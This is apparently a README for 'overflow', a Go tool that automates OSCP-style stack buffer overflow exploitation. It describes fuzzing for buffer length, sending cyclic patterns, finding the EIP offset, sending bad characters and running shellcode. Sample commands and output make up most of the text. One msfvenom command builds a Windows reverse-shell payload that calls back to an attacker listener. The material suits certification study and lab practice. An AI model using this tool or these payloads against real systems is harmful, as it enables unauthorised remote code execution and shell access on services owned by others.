
A command-line tool for exploiting stack-based buffer overflow vulnerabilities.

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Overflow is a command-line tool used exploiting OSCP-style buffer overflow vulnerabilities with a focus on rapid exploitation. However, I would strongly suggest that you understand everything that this tool can do, particularly if you're planning on getting your OSCP certification. Have fun!


Table of Contents


Pre-Built Binaries

If you don't have a golang environment, or you just don't feel like building from source, you can check out the releases page for pre-built binaries.

Using Go Get

If you have a golang environment set up, you can use go get to fetch and install the binary in your $GOPATH/bin directory.

$ go get github.com/sradley/overflow

Building from Source

If you have a golang environment set up, you can build straight from source.

The following commands will install dependencies and compile a working binary.

$ git clone https://github.com/sradley/overflow.git
$ cd overflow
$ go get && go build

You can also use go install to install the binary in your $GOPATH/bin directory.

$ git clone https://github.com/sradley/overflow.git
$ cd overflow
$ go install


The help text is pretty exhaustive, so it's a good place to start if you want to get a feel for this tool.

$ overflow help
$ overflow (fuzz | pattern | offset | chars | exploit) --help

The required flags for (almost) every subcommand are "addr" and "port". You can also specify a template which controls how your payload is sent to the target service (in the the case that a menu or something is presented to you upon connection).

Fuzzing for Buffer Length

Possibly the most important step in buffer overflow exploitation is finding the length of buffer you want to target. An easy way to do this is to send increasingly large sequences of bytes to the buffer until it crashes.

The fuzz subcommand sends increasingly large sequences of bytes (the increase is specifed by the "step" flag) until the service crashes. This tool also outputs the possible size of the buffer, in case it wasn't easy enough already.

The required flags are "addr", "port" and "step".

$ overflow fuzz (-a|--addr ADDR) (-p|--port PORT) (-s|--step STEP) [flags]

Take a look at Examples: Fuzzing for Buffer Length for a more comprehensive example.

Sending Cyclic Patterns

Why would you want to do this? Well, sending a cyclic pattern of bytes to the target service is a very easy way to figure out the offset of the EIP register. Tools like mona can automatically determine the offset of particular registers if buffer has been overflowed with a cyclic pattern of bytes.

The pattern subcommand streamlines the process of generating a cyclic pattern of bytes and sending it to the target service. Turning what is normally an annoying multi-step process into a single command.

The only required flag is "length". If you specify an address and port, it'll send it to the target service as per usual, however, if you omit the address and port the pattern will just be printed to stdout.

$ overflow pattern (-a|--addr ADDR) (-p|--port PORT) (-l|--length LENGTH) [flags]

Take a look at Examples: Sending Cyclic Patterns for a more comprehensive example.

Finding the Offset

The next step after sending the cyclic pattern to the target service is using that pattern to find the various offsets to particular registers (one important register would be EIP). All we would have to do is pass value of the bytes that overwrote the register to the offset subcommand, and we would get the offset of that register.

The only required flag is "query".

$ overflow offset (-q|--query QUERY) [flags]

Take a look at Examples: Finding the Offset for a more comprehensive example.

Sending Bad Characters

An important part of buffer overflow exploitation is determining which characters are "bad", or which characters are treated differently by the target service.

The chars subcommand sends every character from 0x00 to 0xFF to the target service. You can optionally exclude particular characters from the payload sent to the target service.

Required flags are "addr", "port" and "offset".

$ overflow chars (-a|--addr ADDR) (-p|--port PORT) (-o|--offset OFFSET) [flags]

Take a look at Examples: Sending Bad Characters for a more comprehensive example.

Running Exploits

Once you've found the offset of the EIP register, and a valid jump address, you can execute shellcode on the target service. The exploit subcommand provides an easy way to do so.

Required flags are "addr", "port", "offset", "jump" and "shell". Where shell is the path to your desired payload.

$ overflow exploit (-a|--addr ADDR) (-p|--port PORT) (-o|--offset OFFSET) \
    (-j|--jump JUMP) (-s|--shell SHELL) [flags]

Take a look at Examples: Running Exploits for a more comprehensive example.


Templates allow you to insert data before and/or after your payload. They also allow you to navigate through, for example, a menu that you are presented with.

Say you needed to prefix your payload with the string "OVERFLOW1", in order to execute your buffer overflow. You could provide a template like this:

$ overflow ... --template "OVERFLOW1 {payload}"

Special Characters

The only special character of note (and currently supported) is the <CR> special character. Not only does it insert \r\n, but the tool treats it as the end of a message.

Say when you connect to the target service you presented with the following.

Username: <user-input>
Message:  <user-input>

But the buffer overflow is in the "message" part of the service. A template to exploit this would be: stephen<CR>{payload}<CR>. Resulting in an information flow kind of like this:

Username: stephen
Message:  <payload>

In the above template, the stephen<CR> and {payload}<CR> parts are treated as separate messages, allowing you to navigate the menu and insert your buffer overflow where you need it.


Fuzzing for Buffer Length

Here's a quick example using this subcommand to fuzz for the length of the target buffer in 100-byte steps.

$ overflow fuzz -a -p 4444 -s 100
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions

 github.com/sradley                     v2.0.0
  . mode                : fuzz
  . (-a|--addr)         :
  . (-p|--port)         : 4444
  . (-s|--step)         : 100
  . (-w|--wait)         : 1000ms
 > building payload
 > sending 100-byte payload
 > building payload
 > sending 200-byte payload
 > building payload
 > sending 300-byte payload
 > building payload
 > sending 400-byte payload
 > building payload
 > sending 500-byte payload
 success: len of buffer is in range (400, 500]

Sending Cyclic patterns

Here's a quick example using this subcommand to send a 60-byte cyclic pattern to the target service.

$ overflow pattern -a -p 4444 -l 65
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions

 github.com/sradley                     v2.0.0
  . mode                : pattern
  . (-a|--addr)         :
  . (-p|--port)         : 4444
  . (-l|--length)       : 65
 > generating pattern
 > building payload
 > sending 65-byte payload
 success: no errors found

You can see the pattern sent in the netcat output below.

$ nc -lvp 4444
Connection from

If you choose not to specify a host or a port, this is what the output will look like.

$ overflow pattern -l 500
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions
 github.com/sradley                     v2.0.0
  . mode                : pattern
  . (-a|--addr)         : 
  . (-p|--port)         : 0
  . (-l|--length)       : 500
 > generating pattern


Getting the Offset from a Cyclic Pattern

Here's a quick example as to how you'd use the offset subcommand to find the location of a particular sub-pattern.

Note that I'm using the reverse flag to let it know that the target system is little-endian so the bytes in the sub-pattern must be reversed.

$ overflow offset -rq "\x38\x6f\x43\x37"
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions
 github.com/sradley                     v2.0.0
  . mode                : offset
  . (-q|--query)        : "\x38\x6f\x43\x37"
  . (-r|--reverse)      : true
  . (-l|--length)       : 0
 > parsing query
 > searching for query within pattern

 success: pattern offset is: 2003

Sending Bad Characters

Here's an example showing the use of this subcommand. Make sure you include the offset to the EIP register.

$ overflow chars -a -p 4444 -o 160
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions
 github.com/sradley                     v2.0.0
  . mode                : chars
  . (-a|--addr)         :
  . (-p|--port)         : 4444
  . (-o|--offset)       : 160
  . (-e|--exclude)      : ""
 > parsing exclusions
 > generating characters
 > building payload
 > sending 420-byte payload 
 success: no errors found

You can also optionally specify characters to exclude from the payload, make sure that you use the format in the example below.

$ overflow chars -a -p 4444 -o 160 -e "\x00\x41\xAB\x01"
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions

 github.com/sradley                     v2.0.0
  . mode                : chars
  . (-a|--addr)         :
  . (-p|--port)         : 4444
  . (-o|--offset)       : 160
  . (-e|--exclude)      : "\x00\x41\xAB\x01"
 > parsing exclusions
 > generating characters
 > building payload
 > sending 416-byte payload 

 success: no errors found

Running Exploits

Here's a brief example explaining how you can use the exploit subcommand to execute a payload generated by msfvenom.

Generate a raw payload using msfvenom, call it whatever you want.

$ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4321 \
    EXITFUNC=thread -b "\x00" -f raw -o shell

Then just use the tool as follows, ensuring you include the offset to the EIP register and the jump address in the format used in the example below.

$ overflow exploit -a -p 4444 -o 160 -rj "\x5f\x4a\x35\x8f" -s path/to/shell
            /------------------\  lower
            |                  |  memory
            |       Text       |  addresses
            |                  |
            |   (Initialized)  |
            |        Data      |
            |  (Uninitialized) |
            |                  |
            |       Stack      |  higher
            |                  |  memory
            \------------------/  addresses

        Fig. 1 Process Memory Regions
 github.com/sradley                     v2.0.0
  . mode                : exploit
  . (-a|--addr)         :
  . (-p|--port)         : 4444
  . (-o|--offset)       : 160
  . (-j|--jump)         : "\x5f\x4a\x35\x8f"
  . (-r|--reverse)      : true
  . (-n|--nos)          : 16
  . (-s|--shell)        : path/to/shell
 > parsing jump address
 > reading shellcode
 > building payload
 > sending 535-byte payload
 success: no errors found.

Don't forget that if the target system is little-endian you need to write the jump address backwards (e.g. if the address is "\x01\x02\x03\x04", write it as "\x04\x03\x02\x01"). Alternatively, you can just specify the "reverse" flag.

$ overflow exploit ... -rj "\x01\x02\x03\x04" ...